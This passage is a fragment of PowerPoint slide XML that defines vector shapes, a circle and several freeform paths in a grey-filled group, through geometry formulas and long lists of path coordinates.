                <a:gd name="T32" fmla="*/ 587 w 4000"/>
                <a:gd name="T33" fmla="*/ 3412 h 4000"/>
                <a:gd name="T34" fmla="*/ 803 w 4000"/>
                <a:gd name="T35" fmla="*/ 3600 h 4000"/>
                <a:gd name="T36" fmla="*/ 1045 w 4000"/>
                <a:gd name="T37" fmla="*/ 3758 h 4000"/>
                <a:gd name="T38" fmla="*/ 1312 w 4000"/>
                <a:gd name="T39" fmla="*/ 3879 h 4000"/>
                <a:gd name="T40" fmla="*/ 1596 w 4000"/>
                <a:gd name="T41" fmla="*/ 3957 h 4000"/>
                <a:gd name="T42" fmla="*/ 1895 w 4000"/>
                <a:gd name="T43" fmla="*/ 3994 h 4000"/>
                <a:gd name="T44" fmla="*/ 2104 w 4000"/>
                <a:gd name="T45" fmla="*/ 3994 h 4000"/>
                <a:gd name="T46" fmla="*/ 2403 w 4000"/>
                <a:gd name="T47" fmla="*/ 3957 h 4000"/>
                <a:gd name="T48" fmla="*/ 2687 w 4000"/>
                <a:gd name="T49" fmla="*/ 3879 h 4000"/>
                <a:gd name="T50" fmla="*/ 2954 w 4000"/>
                <a:gd name="T51" fmla="*/ 3758 h 4000"/>
                <a:gd name="T52" fmla="*/ 3196 w 4000"/>
                <a:gd name="T53" fmla="*/ 3600 h 4000"/>
                <a:gd name="T54" fmla="*/ 3412 w 4000"/>
                <a:gd name="T55" fmla="*/ 3412 h 4000"/>
                <a:gd name="T56" fmla="*/ 3600 w 4000"/>
                <a:gd name="T57" fmla="*/ 3196 h 4000"/>
                <a:gd name="T58" fmla="*/ 3758 w 4000"/>
                <a:gd name="T59" fmla="*/ 2954 h 4000"/>
                <a:gd name="T60" fmla="*/ 3879 w 4000"/>
                <a:gd name="T61" fmla="*/ 2687 h 4000"/>
                <a:gd name="T62" fmla="*/ 3957 w 4000"/>
                <a:gd name="T63" fmla="*/ 2403 h 4000"/>
                <a:gd name="T64" fmla="*/ 3994 w 4000"/>
                <a:gd name="T65" fmla="*/ 2104 h 4000"/>
                <a:gd name="T66" fmla="*/ 3994 w 4000"/>
                <a:gd name="T67" fmla="*/ 1895 h 4000"/>
                <a:gd name="T68" fmla="*/ 3957 w 4000"/>
                <a:gd name="T69" fmla="*/ 1596 h 4000"/>
                <a:gd name="T70" fmla="*/ 3879 w 4000"/>
                <a:gd name="T71" fmla="*/ 1312 h 4000"/>
                <a:gd name="T72" fmla="*/ 3758 w 4000"/>
                <a:gd name="T73" fmla="*/ 1045 h 4000"/>
                <a:gd name="T74" fmla="*/ 3600 w 4000"/>
                <a:gd name="T75" fmla="*/ 803 h 4000"/>
                <a:gd name="T76" fmla="*/ 3412 w 4000"/>
                <a:gd name="T77" fmla="*/ 587 h 4000"/>
                <a:gd name="T78" fmla="*/ 3196 w 4000"/>
                <a:gd name="T79" fmla="*/ 399 h 4000"/>
                <a:gd name="T80" fmla="*/ 2954 w 4000"/>
                <a:gd name="T81" fmla="*/ 241 h 4000"/>
                <a:gd name="T82" fmla="*/ 2687 w 4000"/>
                <a:gd name="T83" fmla="*/ 120 h 4000"/>
                <a:gd name="T84" fmla="*/ 2403 w 4000"/>
                <a:gd name="T85" fmla="*/ 42 h 4000"/>
                <a:gd name="T86" fmla="*/ 2104 w 4000"/>
                <a:gd name="T87" fmla="*/ 5 h 4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000" h="4000">
                  <a:moveTo>
                    <a:pt x="2000" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2000" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1895" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1795" y="10"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1696" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1501" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1407" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1312" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223" y="157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1134" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045" y="241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="881" y="341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="803" y="399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730" y="457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656" y="520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587" y="587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520" y="656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399" y="803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341" y="881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289" y="961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241" y="1045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199" y="1134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157" y="1223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="1312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="1407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="1501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="1596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="1696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="1795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="1895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="2104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="2204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="2303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="2403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="2498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="2592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="2687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157" y="2776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199" y="2865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241" y="2954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289" y="3038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341" y="3118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399" y="3196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457" y="3269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520" y="3343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587" y="3412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656" y="3479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730" y="3542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="803" y="3600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="881" y="3658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961" y="3710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045" y="3758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1134" y="3800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223" y="3842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1312" y="3879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1407" y="3910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1501" y="3936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596" y="3957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1696" y="3978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1795" y="3989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1895" y="3994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2000" y="3999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2000" y="3999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2104" y="3994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2204" y="3989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303" y="3978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2403" y="3957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2498" y="3936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2592" y="3910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="3879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="3842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2865" y="3800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954" y="3758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3038" y="3710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3118" y="3658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3196" y="3600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3269" y="3542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343" y="3479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3412" y="3412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3479" y="3343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3542" y="3269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3600" y="3196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3658" y="3118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3710" y="3038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3758" y="2954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3800" y="2865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3842" y="2776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3879" y="2687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3910" y="2592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936" y="2498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3957" y="2403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3978" y="2303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989" y="2204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3994" y="2104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3999" y="2000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3999" y="2000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3994" y="1895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989" y="1795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3978" y="1696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3957" y="1596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936" y="1501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3910" y="1407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3879" y="1312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3842" y="1223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3800" y="1134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3758" y="1045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3710" y="961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3658" y="881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3600" y="803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3542" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3479" y="656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3412" y="587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343" y="520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3269" y="457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3196" y="399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3118" y="341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3038" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954" y="241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2865" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2592" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2498" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2403" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2204" y="10"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2104" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2000" y="0"/>
                  </a:lnTo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63" name="Group 162"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3501246" y="2014039"/>
              <a:ext cx="966551" cy="808008"/>
              <a:chOff x="2455863" y="1114425"/>
              <a:chExt cx="2206625" cy="1844675"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="245" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2455863" y="2816225"/>
                <a:ext cx="263525" cy="142875"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 731"/>
                  <a:gd name="T1" fmla="*/ 215 h 395"/>
                  <a:gd name="T2" fmla="*/ 142 w 731"/>
                  <a:gd name="T3" fmla="*/ 357 h 395"/>
                  <a:gd name="T4" fmla="*/ 47 w 731"/>
                  <a:gd name="T5" fmla="*/ 320 h 395"/>
                  <a:gd name="T6" fmla="*/ 53 w 731"/>
                  <a:gd name="T7" fmla="*/ 310 h 395"/>
                  <a:gd name="T8" fmla="*/ 53 w 731"/>
                  <a:gd name="T9" fmla="*/ 310 h 395"/>
                  <a:gd name="T10" fmla="*/ 63 w 731"/>
                  <a:gd name="T11" fmla="*/ 273 h 395"/>
                  <a:gd name="T12" fmla="*/ 68 w 731"/>
                  <a:gd name="T13" fmla="*/ 241 h 395"/>
                  <a:gd name="T14" fmla="*/ 74 w 731"/>
                  <a:gd name="T15" fmla="*/ 215 h 395"/>
                  <a:gd name="T16" fmla="*/ 68 w 731"/>
                  <a:gd name="T17" fmla="*/ 189 h 395"/>
                  <a:gd name="T18" fmla="*/ 68 w 731"/>
                  <a:gd name="T19" fmla="*/ 189 h 395"/>
                  <a:gd name="T20" fmla="*/ 58 w 731"/>
                  <a:gd name="T21" fmla="*/ 163 h 395"/>
                  <a:gd name="T22" fmla="*/ 47 w 731"/>
                  <a:gd name="T23" fmla="*/ 142 h 395"/>
                  <a:gd name="T24" fmla="*/ 26 w 731"/>
                  <a:gd name="T25" fmla="*/ 121 h 395"/>
                  <a:gd name="T26" fmla="*/ 0 w 731"/>
                  <a:gd name="T27" fmla="*/ 105 h 395"/>
                  <a:gd name="T28" fmla="*/ 42 w 731"/>
                  <a:gd name="T29" fmla="*/ 0 h 395"/>
                  <a:gd name="T30" fmla="*/ 730 w 731"/>
                  <a:gd name="T31" fmla="*/ 252 h 395"/>
                  <a:gd name="T32" fmla="*/ 682 w 731"/>
                  <a:gd name="T33" fmla="*/ 394 h 395"/>
                  <a:gd name="T34" fmla="*/ 189 w 731"/>
                  <a:gd name="T35" fmla="*/ 215 h 3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31" h="395">
                    <a:moveTo>
                      <a:pt x="189" y="215"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="142" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="215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" name="Freeform 19"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2693988" y="2770188"/>
                <a:ext cx="71437" cy="68262"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 199 w 200"/>
                  <a:gd name="T1" fmla="*/ 63 h 190"/>
                  <a:gd name="T2" fmla="*/ 147 w 200"/>
                  <a:gd name="T3" fmla="*/ 189 h 190"/>
                  <a:gd name="T4" fmla="*/ 0 w 200"/>
                  <a:gd name="T5" fmla="*/ 126 h 190"/>
                  <a:gd name="T6" fmla="*/ 52 w 200"/>
                  <a:gd name="T7" fmla="*/ 0 h 190"/>
                  <a:gd name="T8" fmla="*/ 199 w 200"/>
                  <a:gd name="T9" fmla="*/ 63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" h="190">
                    <a:moveTo>
                      <a:pt x="199" y="63"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="147" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="63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7" name="Freeform 20"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2540000" y="2514600"/>
                <a:ext cx="263525" cy="244475"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 116 w 731"/>
                  <a:gd name="T1" fmla="*/ 115 h 678"/>
                  <a:gd name="T2" fmla="*/ 116 w 731"/>
                  <a:gd name="T3" fmla="*/ 115 h 678"/>
                  <a:gd name="T4" fmla="*/ 142 w 731"/>
                  <a:gd name="T5" fmla="*/ 68 h 678"/>
                  <a:gd name="T6" fmla="*/ 179 w 731"/>
                  <a:gd name="T7" fmla="*/ 37 h 678"/>
                  <a:gd name="T8" fmla="*/ 179 w 731"/>
                  <a:gd name="T9" fmla="*/ 37 h 678"/>
                  <a:gd name="T10" fmla="*/ 210 w 731"/>
                  <a:gd name="T11" fmla="*/ 15 h 678"/>
                  <a:gd name="T12" fmla="*/ 252 w 731"/>
                  <a:gd name="T13" fmla="*/ 0 h 678"/>
                  <a:gd name="T14" fmla="*/ 252 w 731"/>
                  <a:gd name="T15" fmla="*/ 0 h 678"/>
                  <a:gd name="T16" fmla="*/ 289 w 731"/>
                  <a:gd name="T17" fmla="*/ 0 h 678"/>
                  <a:gd name="T18" fmla="*/ 331 w 731"/>
                  <a:gd name="T19" fmla="*/ 5 h 678"/>
                  <a:gd name="T20" fmla="*/ 331 w 731"/>
                  <a:gd name="T21" fmla="*/ 5 h 678"/>
                  <a:gd name="T22" fmla="*/ 368 w 731"/>
                  <a:gd name="T23" fmla="*/ 15 h 678"/>
                  <a:gd name="T24" fmla="*/ 405 w 731"/>
                  <a:gd name="T25" fmla="*/ 32 h 678"/>
                  <a:gd name="T26" fmla="*/ 405 w 731"/>
                  <a:gd name="T27" fmla="*/ 32 h 678"/>
                  <a:gd name="T28" fmla="*/ 452 w 731"/>
                  <a:gd name="T29" fmla="*/ 58 h 678"/>
                  <a:gd name="T30" fmla="*/ 489 w 731"/>
                  <a:gd name="T31" fmla="*/ 89 h 678"/>
                  <a:gd name="T32" fmla="*/ 489 w 731"/>
                  <a:gd name="T33" fmla="*/ 89 h 678"/>
                  <a:gd name="T34" fmla="*/ 515 w 731"/>
                  <a:gd name="T35" fmla="*/ 126 h 678"/>
                  <a:gd name="T36" fmla="*/ 530 w 731"/>
                  <a:gd name="T37" fmla="*/ 162 h 678"/>
                  <a:gd name="T38" fmla="*/ 530 w 731"/>
                  <a:gd name="T39" fmla="*/ 162 h 678"/>
                  <a:gd name="T40" fmla="*/ 536 w 731"/>
                  <a:gd name="T41" fmla="*/ 205 h 678"/>
                  <a:gd name="T42" fmla="*/ 530 w 731"/>
                  <a:gd name="T43" fmla="*/ 247 h 678"/>
                  <a:gd name="T44" fmla="*/ 530 w 731"/>
                  <a:gd name="T45" fmla="*/ 247 h 678"/>
                  <a:gd name="T46" fmla="*/ 520 w 731"/>
                  <a:gd name="T47" fmla="*/ 294 h 678"/>
                  <a:gd name="T48" fmla="*/ 504 w 731"/>
                  <a:gd name="T49" fmla="*/ 341 h 678"/>
                  <a:gd name="T50" fmla="*/ 467 w 731"/>
                  <a:gd name="T51" fmla="*/ 415 h 678"/>
                  <a:gd name="T52" fmla="*/ 730 w 731"/>
                  <a:gd name="T53" fmla="*/ 546 h 678"/>
                  <a:gd name="T54" fmla="*/ 667 w 731"/>
                  <a:gd name="T55" fmla="*/ 677 h 678"/>
                  <a:gd name="T56" fmla="*/ 0 w 731"/>
                  <a:gd name="T57" fmla="*/ 346 h 678"/>
                  <a:gd name="T58" fmla="*/ 116 w 731"/>
                  <a:gd name="T59" fmla="*/ 115 h 678"/>
                  <a:gd name="T60" fmla="*/ 399 w 731"/>
                  <a:gd name="T61" fmla="*/ 305 h 678"/>
                  <a:gd name="T62" fmla="*/ 399 w 731"/>
                  <a:gd name="T63" fmla="*/ 305 h 678"/>
                  <a:gd name="T64" fmla="*/ 405 w 731"/>
                  <a:gd name="T65" fmla="*/ 283 h 678"/>
                  <a:gd name="T66" fmla="*/ 409 w 731"/>
                  <a:gd name="T67" fmla="*/ 262 h 678"/>
                  <a:gd name="T68" fmla="*/ 409 w 731"/>
                  <a:gd name="T69" fmla="*/ 247 h 678"/>
                  <a:gd name="T70" fmla="*/ 405 w 731"/>
                  <a:gd name="T71" fmla="*/ 226 h 678"/>
                  <a:gd name="T72" fmla="*/ 405 w 731"/>
                  <a:gd name="T73" fmla="*/ 226 h 678"/>
                  <a:gd name="T74" fmla="*/ 399 w 731"/>
                  <a:gd name="T75" fmla="*/ 210 h 678"/>
                  <a:gd name="T76" fmla="*/ 383 w 731"/>
                  <a:gd name="T77" fmla="*/ 194 h 678"/>
                  <a:gd name="T78" fmla="*/ 368 w 731"/>
                  <a:gd name="T79" fmla="*/ 179 h 678"/>
                  <a:gd name="T80" fmla="*/ 342 w 731"/>
                  <a:gd name="T81" fmla="*/ 162 h 678"/>
                  <a:gd name="T82" fmla="*/ 342 w 731"/>
                  <a:gd name="T83" fmla="*/ 162 h 678"/>
                  <a:gd name="T84" fmla="*/ 315 w 731"/>
                  <a:gd name="T85" fmla="*/ 152 h 678"/>
                  <a:gd name="T86" fmla="*/ 294 w 731"/>
                  <a:gd name="T87" fmla="*/ 147 h 678"/>
                  <a:gd name="T88" fmla="*/ 273 w 731"/>
                  <a:gd name="T89" fmla="*/ 147 h 678"/>
                  <a:gd name="T90" fmla="*/ 258 w 731"/>
                  <a:gd name="T91" fmla="*/ 147 h 678"/>
                  <a:gd name="T92" fmla="*/ 258 w 731"/>
                  <a:gd name="T93" fmla="*/ 147 h 678"/>
                  <a:gd name="T94" fmla="*/ 236 w 731"/>
                  <a:gd name="T95" fmla="*/ 158 h 678"/>
                  <a:gd name="T96" fmla="*/ 221 w 731"/>
                  <a:gd name="T97" fmla="*/ 168 h 678"/>
                  <a:gd name="T98" fmla="*/ 205 w 731"/>
                  <a:gd name="T99" fmla="*/ 184 h 678"/>
                  <a:gd name="T100" fmla="*/ 195 w 731"/>
                  <a:gd name="T101" fmla="*/ 210 h 678"/>
                  <a:gd name="T102" fmla="*/ 168 w 731"/>
                  <a:gd name="T103" fmla="*/ 262 h 678"/>
                  <a:gd name="T104" fmla="*/ 368 w 731"/>
                  <a:gd name="T105" fmla="*/ 362 h 678"/>
                  <a:gd name="T106" fmla="*/ 399 w 731"/>
                  <a:gd name="T107" fmla="*/ 305 h 6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31" h="678">
                    <a:moveTo>
                      <a:pt x="116" y="115"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="116" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="115"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="399" y="305"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="399" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
